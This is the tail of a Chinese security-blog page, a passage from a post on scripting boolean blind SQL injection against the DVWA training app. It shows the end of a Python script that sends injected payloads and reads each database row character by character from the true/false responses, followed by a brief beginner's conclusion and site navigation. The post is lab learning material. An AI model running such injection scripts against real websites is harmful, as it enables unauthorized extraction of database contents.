class="string">',1),'</span>+str(m)+<span class="string">',1)=\''</span>+str(n)+<span class="string">'\' %23&amp;Submit=Submit#'</span></span><br><span class="line">                    <span class="keyword">if</span> <span class="string">'User ID exists in the database.'</span> <span class="keyword">in</span> s.get(url+rowContent_payload, headers=headers).text:</span><br><span class="line">                        rowContent += n  </span><br><span class="line">            print(<span class="string">'row'</span>+str(j+<span class="number">1</span>)+<span class="string">'_content: '</span>+rowContent)</span><br></pre></td></tr></table></figure></p>
<p><strong>脚本三运行结果如下:</strong><br><img src="/2019/03/02/以dvwa为例学习简单sql布尔盲注的详细脚本/20190302172239513.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" alt="script3"></p>
<p><br></p>
<h1><span id="0x04-总结">0x04 总结</span></h1><p>由于是刚入门的小白，各方面都在起步之中，还有许多需要继续努学习的，尤其要提高自己的代码编写能力，关于sql注入的学习也还会继续。</p>

      </div>
    </div>
  </div>
</div>
<div class="lx-navigation">
	<div class="lx-cover prev lx-cover-sm" style="background-image: url(/images/footer_1.jpg)">
		<div class="overlay"></div>
		<a class="copy" href="/2019/03/03/CumtCTF2019Ⅱ——Writeup（Web详解）/">
			<div class="display-t">
				<div class="display-tc">
					<div>
						<span>Next</span>
						<h3>CumtCTF2019Ⅱ——Writeup（Web详解）</h3>
					</div>
				</div>
			</div>
		</a>
	</div>
        <div class="lx-cover next lx-cover-sm" style="background-image: url(/images/footer_2.jpg)">
		<div class="overlay"></div>
		<a class="copy" href="/2019/02/13/文件包含漏洞总结/">
			<div class="display-t">
				<div class="display-tc">
					<div>
						<span>Prev</span>
						<h3>文件包含漏洞总结</h3>
					</div>
				</div>
			</div>
		</a>
	</div>
</div>
</div>
<div class="comment"><div id="comments"></div></div>
<footer>
  <div>
  Copyright &copy; 2019.<a href="/">Lethe | 忘川</a>
  </div>
</footer>
</div>

<button class="menu-trigger"></button>
<div class="menu">
  <div class="menu-head">
    <span class="layer">
      <div class="col">
        <div class="row for-pic">
          <div class="profile-pic">
            <a href="/"><img src="/images/2.jpg" alt="Lethe"></a>
          </div>
        </div>
        <div class="row for-name">
          <p>Lethe</p>
          <span class="tagline">Hello, World!</span>
        </div>
      </div>
    </span>
  </div>
  <nav class="menu-container">
  <ul class="menu-items">
    <li><a href="/"><i class="fa fa-home fa-fw"></i>首页</a></li>
    <li><a href="/archives/"><i class="fa fa-archive fa-fw"></i>归档</a></li>
    <li class="has-sub"><span class="dropdown-heading">
      <i class="fa fa-bookmark fa-fw"></i>页面</span>
        <ul>
          <li><a href="/about">关于</a></li>
        </ul>
    </li>
    <li class="has-sub"><span class="dropdown-heading">
      <i class="fa fa-link fa-fw"></i>友链</span>
        <ul>
          <li> <a href="https://hiworldalice.github.io/" target="_blank">Tunt</a></li>
        <li> <a href="https://3nd.xyz" target="_blank">3ND</a></li>
        </ul>
    </li>
  </ul>
  </nav>
</div>

<div class="gototop js-top">
  <a href="#" class="js-gotop"><i class="fa fa-arrow-up"></i></a>
</div>
<script src="/js/jquery.easing.min.js"></script>
<script src="/js/jquery.waypoints.min.js"></script>
<script src="/js/jquery.stellar.min.js"></script>
<script src="/js/main.js"></script>



</body>
</html>
